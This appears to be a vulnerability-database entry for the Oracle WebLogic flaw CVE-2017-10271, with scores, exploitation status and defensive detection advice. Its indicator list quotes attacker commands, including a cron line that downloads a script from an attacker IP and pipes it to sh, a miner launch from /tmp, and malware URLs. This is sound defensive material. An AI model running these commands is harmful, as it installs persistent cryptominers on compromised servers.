cbcvebase.
CVE-2017-10271
published 2017-10-19

CVE-2017-10271: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are…

PriorityP194high7.5CVSS 3.1
AVNACLPRNUINSUCNINAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-08-10
Exploited in the wild
EPSS
99.99%
100.0th percentile
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

Affected

8 ranges
VendorProductVersion rangeFixed in
oracleweblogic_server
oracleweblogic_server
oracleweblogic_server
oracleweblogic_server
oracle_corporationweblogic_server
oracle_corporationweblogic_server
oracle_corporationweblogic_server
oracle_corporationweblogic_server

Detection & IOCsextracted from sources · hover to see the quote

ip94.250.253.178
urlhxxp://94.250.253.178/logo8.sh
urlhxxp://94.250.253.178/xmrig_64
urlhxxp://94.250.253.178/httpd5_w1.conf
path/tmp/vmak
path/tmp/httpd5_w1.conf
path/tmp/logo8.sh
filenamelogo8.sh
port7001/TCP
commandecho "* * * * * wget -q hxxp://94.250.253.178/logo8.sh -O - | sh" >> /tmp/cron || true && crontab /tmp/cron
commandpkill -f minergate
commandpkill -f minergate-cli
commandnohup /tmp/vmak -c /tmp/httpd5_w1.conf>/dev/null 2>&1 &
domainlist[.]idc3389[.]top
domainkingminer[.]club
domainrat[.]kingminer[.]club
port57890
domainbulehero[.]in
urlhxxp://fid[.]hognoob[.]se/download.exe
domainfid[.]hognoob[.]se
ip195[.]128[.]126[.]241
domainuio[.]hognoob[.]se
path/public/hydra.php
urlhxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe
ip3[.]123[.]17[.]223
otherCoinminer_MALXMR.DBFAJ-Component
  • Monitor for inbound HTTP POST requests to Oracle WebLogic on port 7001/TCP targeting the WLS-WSAT endpoint, which is the attack vector for CVE-2017-10271
  • Detect post-exploitation shell script execution dropping files to /tmp/ (vmak, httpd5_w1.conf, logo8.sh) and subsequent cron persistence via /tmp/cron
  • Alert on process execution of 'pkill -f minergate' or 'pkill -f minergate-cli' as a pre-mining cleanup step indicative of this campaign
  • Detect PowerShell post-exploit downloading executables saved as simple numeric filenames (e.g. '13.exe') in the TEMP folder following WebLogic exploitation
  • Detect outbound connections to port 57890 from WebLogic servers, used by the Panda actor to retrieve miner config files
  • Detect creation or access of the PHP webshell at path /public/hydra.php, dropped by Panda actor post-exploitation of CVE-2017-10271
  • Check Point IPS signature available for this CVE: 'Oracle WebLogic WLS Security Component Remote Code Execution (CVE-2017-10271)'
  • ·Oracle WebLogic listens on port 7001/TCP by default; this is the primary attack surface for CVE-2017-10271 exploitation and should be restricted or monitored at the network perimeter
  • ·Affected versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, and 12.2.1.2.0; unpatched servers remain exploitable by unauthenticated remote attackers via T3 protocol

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
vulncheck7.5HIGH
cisa7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.